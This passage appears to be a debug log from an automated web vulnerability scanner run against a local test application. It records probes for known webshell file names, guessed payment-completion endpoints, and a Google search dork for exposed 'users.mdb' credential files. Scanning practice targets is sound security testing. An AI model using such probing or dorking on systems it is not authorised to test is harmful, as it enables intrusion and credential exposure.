(id=2777,from_cache=0,grep=1,rtt=0.14,did=w2xRbqfJ) [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/includes/successful returned HTTP code "404" (id=2775,from_cache=0,grep=1,rtt=0.13,did=29qHwyVH) [Wed Feb 12 09:41:39 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/perlcmd.cgi") took 1.12s to run [Wed Feb 12 09:41:39 2020 - debug] url_session.grep(uri="http://localhost:9090/perlcmd.cgi") took 0.98s to run [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/modules/completepayment.php3 returned HTTP code "404" (id=2774,from_cache=0,grep=1,rtt=0.19,did=eGv4NA9T) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/includes/paymentsuccessful returned HTTP code "404" (id=2776,from_cache=0,grep=1,rtt=0.10,did=rsUvc3oY) [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/servlet/transactioncomplete returned HTTP code "404" (id=2779,from_cache=0,grep=1,rtt=0.30,did=eUehbwRE) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/libraries/validatepayment.php4 returned HTTP code "404" (id=2782,from_cache=0,grep=1,rtt=0.42,did=QQDULwF7) [Wed Feb 12 09:41:39 2020 - debug] localhost:9090 connection pool stats (free:45 / in_use:7 / max:50 / total:52) [Wed Feb 12 09:41:39 2020 - debug] Connections with more in use time: (ff37903b27d7f8f9, 0.31 sec) (51c120544df55e56, 0.12 sec) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/inc/validatepay.php3 returned HTTP code "404" (id=2785,from_cache=0,grep=1,rtt=0.49,did=NLDjmh49) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/inc/completepayment returned HTTP code "404" (id=2786,from_cache=0,grep=1,rtt=0.04,did=EHUnFTfS) [Wed Feb 12 09:41:39 2020 - debug] private_ip.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] motw.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] meta_generator.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] retirejs.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/final.aspx returned HTTP code "404" (id=2787,from_cache=0,grep=1,rtt=0.11,did=H5eBoB6C) [Wed Feb 12 09:41:39 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1249, 'reject-seen-url': 1084, 'reject-out-of-scope': 31, 'accept': 211} [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/return.php returned HTTP code "404" (id=2784,from_cache=0,grep=1,rtt=0.19,did=QfnXnjiO) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/validatepayment.rb returned HTTP code "404" (id=2778,from_cache=0,grep=1,rtt=0.20,did=wZicqJHv) [Wed Feb 12 09:41:39 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] svn_users.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:39 2020 - debug] serialized_object.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] blank_body.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] credit_cards.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] websockets_links.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] csp.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] dom_xss.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] vulners_db.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] keys.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] expect_ct.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] clamav.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] file_upload.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/inc/validate.php3 returned HTTP code "404" (id=2781,from_cache=0,grep=1,rtt=0.27,did=zO6C8FAu) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/success.pl returned HTTP code "404" (id=2788,from_cache=0,grep=1,rtt=0.19,did=3jaVHfde) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.php4 returned HTTP code "404" (id=2780,from_cache=0,grep=1,rtt=0.21,did=yqaggd6C) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/inc/complete.php5 returned HTTP code "404" (id=2783,from_cache=0,grep=1,rtt=0.12,did=8c3A2kTz) [Wed Feb 12 09:41:39 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.php returned HTTP code "404" (id=2790,from_cache=0,grep=1,rtt=0.19,did=t7XUXd2w) [Wed Feb 12 09:41:39 2020 - debug] symfony.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] objects.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] error_500.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] meta_tags.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] password_profiling.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] click_jacking.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] lang.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/includes/completepay.php5 returned HTTP code "404" (id=2792,from_cache=0,grep=1,rtt=0.22,did=u21kG25B) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/finished.php4 returned HTTP code "404" (id=2793,from_cache=0,grep=1,rtt=0.19,did=CkXrT0we) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/inc/completepay.php3 returned HTTP code "404" (id=2704,from_cache=0,grep=1,rtt=0.08,did=DzOZUPZb) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=2795,from_cache=0,grep=0,rtt=0.21,did=IUFRf5gL) [Wed Feb 12 09:41:39 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: IUFRf5gL) [Wed Feb 12 09:41:39 2020 - debug] detailed._login() took 0.96s to run [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/transactioncomplete.jsp returned HTTP code "404" (id=2791,from_cache=0,grep=1,rtt=0.19,did=iAAeKVkw) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/modules/paid.cgi returned HTTP code "404" (id=2789,from_cache=0,grep=1,rtt=0.15,did=qezfS6AZ) [Wed Feb 12 09:41:39 2020 - debug] error_pages.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.11s to run [Wed Feb 12 09:41:39 2020 - debug] strange_reason.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] cache_control.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] strange_headers.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/modules/validpay.rb returned HTTP code "404" (id=2794,from_cache=0,grep=1,rtt=0.14,did=1rjlviZt) [Wed Feb 12 09:41:39 2020 - debug] ssn.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] oracle.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] feeds.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.00s to run [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/libraries/paymentsuccessful.php returned HTTP code "404" (id=2796,from_cache=0,grep=1,rtt=0.28,did=TYcYkHoN) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/pay.php5 returned HTTP code "404" (id=2797,from_cache=0,grep=1,rtt=0.23,did=vp9UtXLW) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/modules/success returned HTTP code "404" (id=2798,from_cache=0,grep=1,rtt=0.36,did=1oEEcAnM) [Wed Feb 12 09:41:39 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 139. [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.rb returned HTTP code "404" (id=2799,from_cache=0,grep=1,rtt=0.32,did=uAGyrSco) [Wed Feb 12 09:41:39 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 0.10s to run [Wed Feb 12 09:41:39 2020 - debug] localhost:9090 connection pool stats (free:46 / in_use:7 / max:50 / total:53) [Wed Feb 12 09:41:39 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.14 sec) (62e87e81607155f6, 0.12 sec) (20c6fb7a85d275d0, 0.08 sec) (ff9acc2bc4ba5606, 0.07 sec) (ff37903b27d7f8f9, 0.03 sec) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/servlet/paid returned HTTP code "404" (id=2800,from_cache=0,grep=1,rtt=0.20,did=Et9qb66x) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/module/valid.pl returned HTTP code "404" (id=2801,from_cache=0,grep=1,rtt=0.25,did=VzKzi6te) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/modules/return returned HTTP code "404" (id=2805,from_cache=0,grep=1,rtt=0.08,did=5oj1WPkd) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/validation.rb returned HTTP code "404" (id=2806,from_cache=0,grep=1,rtt=0.22,did=jscaX9vG) [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/includes/validatepay.php3 returned HTTP code "404" (id=2803,from_cache=0,grep=1,rtt=0.23,did=GXUXgvLF) [Wed Feb 12 09:41:39 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1260, 'reject-seen-url': 1098, 'reject-out-of-scope': 31, 'accept': 211} [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/libraries/valid.rb returned HTTP code "404" (id=2802,from_cache=0,grep=1,rtt=0.40,did=6j3PU1QD) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/includes/final.py returned HTTP code "404" (id=2705,from_cache=0,grep=1,rtt=0.29,did=fTD3ce57) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/modules/paid.asp returned HTTP code "404" (id=2809,from_cache=0,grep=1,rtt=0.12,did=vO1OcAY0) [Wed Feb 12 09:41:39 2020 - debug] POST http://localhost:9090/module/transactioncomplete.rb returned HTTP code "404" (id=2807,from_cache=0,grep=1,rtt=0.17,did=5NvM9eEY) [Wed Feb 12 09:41:39 2020 - debug] http_in_body.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 1.14s to run [Wed Feb 12 09:41:39 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 1.10s to run [Wed Feb 12 09:41:39 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 1.11s to run [Wed Feb 12 09:41:39 2020 - debug] url_session.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 1.04s to run [Wed Feb 12 09:41:39 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:39 2020 - debug] GET http://localhost:9090/libraries/validatepayment.php4 returned HTTP code "404" (id=2817,from_cache=0,grep=1,rtt=0.27,did=L1KXvSIA) [Wed Feb 12 09:41:39 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 1.13s to run [Wed Feb 12 09:41:39 2020 - debug] html_comments.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 1.14s to run [Wed Feb 12 09:41:40 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/JspWebshell1.2.jsp") took 1.18s to run [Wed Feb 12 09:41:40 2020 - debug] POST http://localhost:9090/servlet/final.pl returned HTTP code "404" (id=2808,from_cache=0,grep=1,rtt=0.11,did=KhFLOQ7X) [Wed Feb 12 09:41:40 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.php returned HTTP code "404" (id=2814,from_cache=0,grep=1,rtt=0.23,did=1mLNlDyh) [Wed Feb 12 09:41:40 2020 - debug] POST http://localhost:9090/module/validatepayment.php4 returned HTTP code "404" (id=2822,from_cache=0,grep=1,rtt=0.15,did=XHO37HjE) [Wed Feb 12 09:41:40 2020 - debug] GET http://localhost:9090/servlet/transactioncomplete returned HTTP code "404" (id=2823,from_cache=0,grep=1,rtt=0.24,did=GDb1MTZv) [Wed Feb 12 09:41:41 2020 - debug] POST http://localhost:9090/inc/complete.php returned HTTP code "404" (id=2824,from_cache=0,grep=1,rtt=0.28,did=6GdIqIgy) [Wed Feb 12 09:41:41 2020 - debug] POST http://localhost:9090/inc/paymentsuccess returned HTTP code "404" (id=2811,from_cache=0,grep=1,rtt=0.16,did=wPED5JsZ) [Wed Feb 12 09:41:41 2020 - debug] POST http://localhost:9090/inc/completepayment.cgi returned HTTP code "404" (id=2804,from_cache=0,grep=1,rtt=0.07,did=fSBalgKi) [Wed Feb 12 09:41:41 2020 - debug] POST http://localhost:9090/modules/validpay.php4 returned HTTP code "404" (id=2820,from_cache=0,grep=1,rtt=0.34,did=lgZ5nmvU) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/module/finished.php5 returned HTTP code "404" (id=2810,from_cache=0,grep=1,rtt=0.13,did=WReovhu7) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/module/success.php3 returned HTTP code "404" (id=2819,from_cache=0,grep=1,rtt=0.34,did=csYDwycC) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/includes/successful returned HTTP code "404" (id=2812,from_cache=0,grep=1,rtt=0.13,did=2stZwUVK) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/includes/paymentsuccessful returned HTTP code "404" (id=2815,from_cache=0,grep=1,rtt=0.32,did=qL2jv9km) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/includes/validate.rb returned HTTP code "404" (id=2825,from_cache=0,grep=1,rtt=0.23,did=9Ui1c71L) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.php4 returned HTTP code "404" (id=2826,from_cache=0,grep=1,rtt=0.34,did=bbcC1mBH) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/includes/completepay.php5 returned HTTP code "404" (id=2828,from_cache=0,grep=1,rtt=0.47,did=D0j7Z8ku) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/servlet/payment.rb returned HTTP code "404" (id=2827,from_cache=0,grep=1,rtt=0.24,did=yGqf2883) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/modules/pay.pl returned HTTP code "404" (id=2821,from_cache=0,grep=1,rtt=0.32,did=mrQofa8d) [Wed Feb 12 09:41:42 2020 - debug] symfony.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] private_ip.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] motw.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] meta_generator.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] retirejs.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] file_upload.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:42 2020 - debug] serialized_object.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] blank_body.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] credit_cards.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] websockets_links.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] csp.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] dom_xss.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] vulners_db.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] keys.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] clamav.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] svn_users.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] expect_ct.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/libraries/paymentsuccessful.aspx returned HTTP code "404" (id=2816,from_cache=0,grep=1,rtt=0.16,did=heNuJjHm) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/module/return.aspx returned HTTP code "404" (id=2813,from_cache=0,grep=1,rtt=0.24,did=5oWk1YoF) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/inc/completepay.php3 returned HTTP code "404" (id=2831,from_cache=0,grep=1,rtt=0.51,did=I1BpqyiG) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/servlet/pay.php returned HTTP code "404" (id=2830,from_cache=0,grep=1,rtt=0.12,did=XhBX9iIi) [Wed Feb 12 09:41:42 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] objects.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] error_500.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] meta_tags.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] password_profiling.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] click_jacking.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/inc/validate.php3 returned HTTP code "404" (id=2818,from_cache=0,grep=1,rtt=0.21,did=eb1sfl8E) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/includes/paymentsuccess returned HTTP code "404" (id=2833,from_cache=0,grep=1,rtt=0.15,did=HlcK14Qe) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/modules/success.cgi returned HTTP code "404" (id=2829,from_cache=0,grep=1,rtt=0.30,did=x39wC70o) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/modules/transactioncomplete.rb returned HTTP code "404" (id=2832,from_cache=0,grep=1,rtt=0.15,did=bY9uN0YS) [Wed Feb 12 09:41:42 2020 - debug] lang.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/module/valid.php3 returned HTTP code "404" (id=2835,from_cache=0,grep=1,rtt=0.24,did=IhDJ6K3V) [Wed Feb 12 09:41:42 2020 - debug] get_emails.grep(uri="http://localhost:9090/perlcmd.cgi") took 2.88s to run [Wed Feb 12 09:41:42 2020 - debug] localhost:9090 connection pool stats (free:44 / in_use:9 / max:50 / total:53) [Wed Feb 12 09:41:42 2020 - debug] Connections with more in use time: (51c120544df55e56, 0.39 sec) (20c6fb7a85d275d0, 0.28 sec) (ff37903b27d7f8f9, 0.27 sec) (d49dc8e833c97ce2, 0.21 sec) (ff9acc2bc4ba5606, 0.19 sec) [Wed Feb 12 09:41:42 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 138. [Wed Feb 12 09:41:42 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] GET http://www.google.com/search?q=site:localhost filetype:mdb inurl:users.mdb&start=0&sa=N&hl=en returned HTTP code "429" (id=2837,from_cache=0,grep=1,rtt=0.25,did=ehyx4Va5) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/servlet/paid.cgi returned HTTP code "404" (id=2834,from_cache=0,grep=1,rtt=0.21,did=88130GRs) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/includes/completepay.php returned HTTP code "404" (id=2838,from_cache=0,grep=1,rtt=0.16,did=r3oMBcyL) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/libraries/validatepayment.php5 returned HTTP code "404" (id=2839,from_cache=0,grep=1,rtt=0.24,did=8aCkuMGb) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/servlet/transactioncomplete.cgi returned HTTP code "404" (id=2841,from_cache=0,grep=1,rtt=0.01,did=vL87Fggc) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/module/transactioncomplete.rb returned HTTP code "404" (id=2842,from_cache=0,grep=1,rtt=0.19,did=5W74Bpgs) [Wed Feb 12 09:41:42 2020 - debug] error_pages.grep(uri="http://localhost:9090/shell.cgi") took 0.12s to run [Wed Feb 12 09:41:42 2020 - debug] strange_reason.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] cache_control.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] strange_headers.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] ssn.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] oracle.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] feeds.grep(uri="http://localhost:9090/shell.cgi") took 0.00s to run [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/includes/validate.php4 returned HTTP code "404" (id=2844,from_cache=0,grep=1,rtt=0.22,did=RKrLi4dU) [Wed Feb 12 09:41:42 2020 - debug] Google is telling us to stop doing automated tests. [Wed Feb 12 09:41:42 2020 - debug] Google search for: 'site:localhost filetype:mdb inurl:users.mdb' returned 0 unique results [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/servlet/payment.php4 returned HTTP code "404" (id=2840,from_cache=0,grep=1,rtt=0.15,did=ygcYX4Lz) [Wed Feb 12 09:41:42 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/shell.cgi") took 0.12s to run [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/modules/pay.php3 returned HTTP code "404" (id=2846,from_cache=0,grep=1,rtt=0.39,did=PGutNZet) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/modules/return returned HTTP code "404" (id=2848,from_cache=0,grep=1,rtt=0.07,did=5XYsRLs3) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/servlet/final.pl returned HTTP code "404" (id=2849,from_cache=0,grep=1,rtt=0.13,did=UvzIfVzF) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/libraries/valid.php4 returned HTTP code "404" (id=2847,from_cache=0,grep=1,rtt=0.46,did=i1Yu4R2q) [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/module/validatepayment.php4 returned HTTP code "404" (id=2851,from_cache=0,grep=1,rtt=0.30,did=fBi22X9S) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.aspx returned HTTP code "404" (id=2850,from_cache=0,grep=1,rtt=0.52,did=xj9IbUZA) [Wed Feb 12 09:41:42 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:42 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:41:42 2020 - debug] GET http://localhost:9090/module/validation.rb returned HTTP code "404" (id=2843,from_cache=0,grep=1,rtt=0.36,did=MsQ6gnV6) [Wed Feb 12 09:41:42 2020 - debug] POST http://localhost:9090/includes/paymentsuccessful.cgi returned HTTP code "404" (id=2845,from_cache=0,grep=1,rtt=0.38,did=Mnq1ms3k) [Wed Feb 12 09:41:42 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/shell.cgi") took 1.00s to run [Wed Feb 12 09:41:42 2020 - debug] html_comments.grep(uri="http://localhost:9090/shell.cgi") took 